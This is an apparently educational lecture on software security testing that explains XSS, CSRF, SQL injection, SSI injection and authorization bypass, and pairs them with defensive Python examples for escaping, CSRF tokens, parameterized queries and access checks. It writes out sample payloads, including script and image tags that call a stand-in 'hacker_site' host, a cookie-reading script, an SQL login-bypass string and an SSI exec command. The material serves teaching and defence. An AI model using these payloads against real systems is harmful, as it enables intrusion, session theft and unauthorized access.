Security Testing or Security and Access Control Testing

Lecture



Security testing is a testing strategy used to check the security of a system and to analyze the risks involved in protecting an application as a whole: from attacks by intruders, from viruses, and from unauthorized access to confidential data.

Software Security Principles

The overall security strategy is based on three main principles:

  1. confidentiality
  2. integrity
  3. availability

Confidentiality

Confidentiality is the concealment of certain resources or information. Confidentiality can be understood as restricting access to a resource to a certain category of users or, in other words, as defining under what conditions a user is authorized to access that resource.

Integrity

There are two main criteria when defining the concept of integrity:

  1. Trust. The resource is expected to be changed only in the appropriate way and only by a certain group of users.
  2. Damage and recovery. When data is damaged or changed incorrectly by an authorized or unauthorized user, you must determine how important the data recovery procedure is.

Availability

Availability is the requirement that resources be available to an authorized user, internal object, or device. As a rule, the more critical a resource, the higher its required level of availability.

Types of vulnerabilities

Currently, the most common types of software security vulnerabilities are:

  • XSS (Cross-Site Scripting) is a type of vulnerability in software (Web applications) in which malicious scripts are injected into a server-generated page and run in the client's browser in order to attack that client.
  • XSRF / CSRF (Cross-Site Request Forgery) is a type of vulnerability that exploits shortcomings of the HTTP protocol. The attack works as follows: a link to a malicious site is placed on a page the user trusts; when the user follows it, a request is sent on the user's behalf that obtains the user's confidential data (passwords, billing information, etc.), sends SPAM messages in the user's name, or changes the access settings of the user's account in order to take full control of it.
  • Code injection (SQL, PHP, ASP, etc.) is a type of vulnerability that makes it possible to run executable code in order to gain access to system resources, obtain unauthorized access to data, or disable the system.
  • Server-Side Includes (SSI) Injection is a type of vulnerability in which server commands are inserted into HTML code or launched directly on the server.
  • Authorization Bypass is a type of vulnerability in which it is possible to gain unauthorized access to another user's account or documents.

How to test software for security?

Below are examples of testing software for vulnerabilities in its security mechanisms. To do this, check your software against the known types of vulnerabilities:

XSS (Cross-Site Scripting)

XSS attacks themselves can be very diverse. Just by placing a malicious script on your site, an attacker can try to steal your cookies, redirect you to a site where a more serious attack will take place, load a malicious object into memory, and so on. As an example, consider the following script, which displays your cookies:

<script>alert(document.cookie);</script>

or a script that redirects to the infected page:

<script>window.parent.location.href = 'http://hacker_site';</script>

or one that creates a malicious object containing a virus, etc.:

<object type="text/x-scriptlet" data="http://hacker_site"></object>

To view more examples, we recommend visiting the page: XSS (Cross Site Scripting) ...
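The defensive counterpart of the three payloads above is output encoding: if user-supplied text is HTML-entity-encoded before it is placed into the server-generated page, the browser shows the text literally instead of executing it. The following Python snippet is an added example written for this lecture, not code from the original page; the two renderer functions, the `<div class="comment">` wrapper and the check helper are assumptions, and the payload list simply reuses the lecture's own three examples as constructed test data.

```python
import html

# Constructed sample inputs: the three payloads quoted in the lecture.
# They are test data for the renderers below, not live content.
PAYLOADS = [
    "<script>alert(document.cookie);</script>",
    "<script>window.parent.location.href = 'http://hacker_site';</script>",
    '<object type="text/x-scriptlet" data="http://hacker_site"></object>',
]


def render_comment_unsafe(text: str) -> str:
    """Vulnerable renderer (assumed): user text is concatenated straight into
    the server-generated page, so any tag the user typed becomes live markup."""
    return f'<div class="comment">{text}</div>'


def render_comment(text: str) -> str:
    """Hardened renderer: HTML-entity-encode the text for an element body.
    quote=True also encodes quote characters, which matters if the same
    helper is ever reused inside an attribute value."""
    return f'<div class="comment">{html.escape(text, quote=True)}</div>'


def contains_active_content(page: str) -> bool:
    """Test oracle: does the rendered page still contain a raw <script> or
    <object> tag, i.e. did the payload survive as markup?"""
    lowered = page.lower()
    return "<script" in lowered or "<object" in lowered


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("unsafe :", render_comment_unsafe(payload))
        print("escaped:", render_comment(payload))
```

Entity encoding is the right defence for text placed in an element body or a quoted attribute; text that ends up inside a URL, a JavaScript string or a CSS value needs the encoding appropriate to that context instead, so a security test should exercise every place where user input is reflected, not just the comment body.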

XSRF / CSRF (Request Forgery)

The most frequent CSRF attacks use the HTML <IMG> tag or the JavaScript Image object. Most often, the attacker adds the necessary code to an e-mail or places it on a website, so that when the page loads, the browser sends a request that carries out the malicious action. Examples:

IMG SRC

<img src="http://hacker_site/?command">

SCRIPT SRC

<script src="http://hacker_site/?command"></script>

Javascript image object

  <script>
    var foo = new Image();
    foo.src = "http://hacker_site/?command";
  </script>
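All three forged-request shapes above share two properties: the browser sends them as GET, and the attacker's page cannot read anything the victim's site put into its own forms. A state-changing endpoint can therefore refuse GET outright and require a per-session synchronizer token that only the site's own forms carry. The Python below is an added illustration of that check, not code from the lecture; the `Session` and `Request` models, the `/transfer` endpoint and the `csrf_token` field name are assumptions, and every request in `demo()` is constructed.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    """Server-side session for a logged-in user (assumed model). The CSRF
    token is generated per session and embedded only in the site's own forms."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal request model: method, path and the submitted parameters
    (query string for GET, form fields for POST)."""
    method: str
    path: str
    params: dict


def handle_transfer(session: Session, request: Request) -> str:
    """State-changing endpoint with two CSRF defences.

    1. Only POST is accepted, so a request forged with <img src=...>,
       <script src=...> or new Image(), which the browser always sends as
       GET, is refused before any work is done.
    2. The session's token must be present in the body and is compared in
       constant time. A page on another origin cannot read the token, so a
       forged POST (a hidden auto-submitting form) is refused as well.
    """
    if request.method != "POST":
        return "rejected: state change attempted via GET"
    submitted = request.params.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return "rejected: missing or wrong CSRF token"
    return f"ok: transferred {request.params['amount']} for {session.user}"


def demo() -> list:
    """Replay the lecture's forged-request shapes and one legitimate form
    submission against the handler. All requests are constructed."""
    session = Session(user="alice")
    forged_get = Request("GET", "/transfer", {"amount": "1000"})      # <img>/<script>/Image()
    forged_post = Request("POST", "/transfer", {"amount": "1000"})    # hidden cross-site form
    legit = Request("POST", "/transfer",
                    {"amount": "1000", "csrf_token": session.csrf_token})
    return [handle_transfer(session, r) for r in (forged_get, forged_post, legit)]


if __name__ == "__main__":
    for line in demo():
        print(line)
```

When testing an application for CSRF, the check is the mirror image of the code: find every request that changes state, replay it without the token (and as GET), and confirm the server refuses it.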

Code injections (SQL, PHP, ASP, etc.)

We will consider injection of executable code using SQL code as the example.

The login form has two fields: name and password. They are processed in the database by executing an SQL query:

  SELECT Username
  FROM Users
  WHERE Name = 'tester'
  AND Password = 'testpass';

Enter the correct name 'tester', and in the password field enter the string:

testpass' OR '1' = '1

As a result, if the field has no appropriate validation or input handling, a vulnerability appears that lets you log into the password-protected system, because the SQL query will look like this:

  SELECT Username
  FROM Users
  WHERE Name = 'tester'
  AND Password = 'testpass' OR '1' = '1';

The condition '1' = '1' is always true, and because OR binds more loosely than AND, the query will always return rows regardless of the password entered.
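The defect is that the query is assembled by string concatenation, so the quote in the password ends the string literal and the rest of the input becomes SQL. The fix is a parameterized query, in which the password is passed as a bound value and is never parsed as SQL. The following Python example is added here and is not code from the lecture: it rebuilds the lecture's Users table in an in-memory SQLite database (the single sample row is constructed, and the plain-text Password column mirrors the lecture's schema rather than recommended practice), then runs the lecture's test input through a vulnerable and a parameterized login function.

```python
import sqlite3


def _connect() -> sqlite3.Connection:
    """Fresh in-memory database with the lecture's Users table.
    The sample row is constructed; the plain-text Password column follows
    the lecture's schema (a real system stores a salted password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Name TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('tester', 'tester', 'testpass')")
    conn.commit()
    return conn


def build_vulnerable_query(name: str, password: str) -> str:
    """The lecture's query assembled by string concatenation (the defect):
    whatever the user typed is spliced into the SQL text verbatim."""
    return (
        f"SELECT Username FROM Users "
        f"WHERE Name = '{name}' AND Password = '{password}'"
    )


def vulnerable_login(name: str, password: str) -> bool:
    """Returns True when the concatenated query yields at least one row."""
    conn = _connect()
    try:
        rows = conn.execute(build_vulnerable_query(name, password)).fetchall()
    finally:
        conn.close()
    return len(rows) > 0


def safe_login(name: str, password: str) -> bool:
    """Parameterized form: the driver binds name and password as values,
    so a quote or OR inside the password is just part of the string."""
    conn = _connect()
    try:
        rows = conn.execute(
            "SELECT Username FROM Users WHERE Name = ? AND Password = ?",
            (name, password),
        ).fetchall()
    finally:
        conn.close()
    return len(rows) > 0


if __name__ == "__main__":
    probe = "wrong' OR '1' = '1"
    print(build_vulnerable_query("tester", probe))
    print("vulnerable:", vulnerable_login("tester", probe))
    print("safe      :", safe_login("tester", probe))
```

Note that the test uses a wrong password prefix rather than the lecture's `testpass`, so that the bypass is visible on its own: with the real password in the string, both functions would succeed and the defect would be masked.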

Server-Side Includes (SSI) Injection

The commands differ depending on the operating system; as an example, consider the command that displays a list of files in Linux:

<!--#exec cmd="ls" -->

Authorization bypass

User A can access user B's documents. Suppose there is an implementation in which, when a user views his profile containing confidential information, the userID is passed in the page URL. In this case it makes sense to try substituting another user's userID. If you then see that user's data, you have found a defect.
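The manual test described above can be turned into a systematic check: for every pair of users, request the second user's record while authenticated as the first and record every case where the data comes back. The Python below is an added example, not code from the lecture; the two-user profile table is constructed, and the handler signatures, the `Forbidden` exception and the `find_authorization_leaks` helper are assumptions made for the illustration.

```python
from __future__ import annotations

# Constructed sample data: two users' profiles keyed by userID.
PROFILES = {
    1: {"name": "User A", "email": "a@example.com"},
    2: {"name": "User B", "email": "b@example.com"},
}


class Forbidden(Exception):
    """Raised when the caller is not allowed to see the requested record."""


def view_profile_unsafe(session_user_id: int, requested_user_id: int) -> dict:
    """The defective implementation from the lecture: the userID taken from
    the URL is trusted on its own and the session owner is never consulted."""
    return PROFILES[requested_user_id]


def view_profile(session_user_id: int, requested_user_id: int) -> dict:
    """Hardened implementation: object-level authorization. The record is
    returned only if it belongs to the user the session was issued to."""
    if session_user_id != requested_user_id:
        raise Forbidden(
            f"user {session_user_id} may not view profile {requested_user_id}"
        )
    return PROFILES[requested_user_id]


def find_authorization_leaks(handler) -> list[tuple[int, int]]:
    """Run the lecture's manual test systematically: for every (viewer,
    target) pair with viewer != target, call the handler as `viewer` asking
    for `target`, and report the pairs where the target's data came back."""
    leaks = []
    for viewer in PROFILES:
        for target in PROFILES:
            if viewer == target:
                continue
            try:
                data = handler(viewer, target)
            except Forbidden:
                continue  # refused: the correct behaviour
            if data == PROFILES[target]:
                leaks.append((viewer, target))
    return leaks


if __name__ == "__main__":
    print("unsafe handler leaks:", find_authorization_leaks(view_profile_unsafe))
    print("hardened handler leaks:", find_authorization_leaks(view_profile))
```

If some roles legitimately need to read other users' records (support staff, for example), that permission should be an explicit rule inside the handler, and the test above should then expect exactly those pairs and no others.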


Conclusion

There are a huge number of examples of vulnerabilities and attacks. Even after conducting a full cycle of security testing, you cannot be 100% sure that the system is truly secure. But you can be sure that the share of unauthorized penetrations, information theft, and data loss will be several times lower than for those who did not conduct security testing.

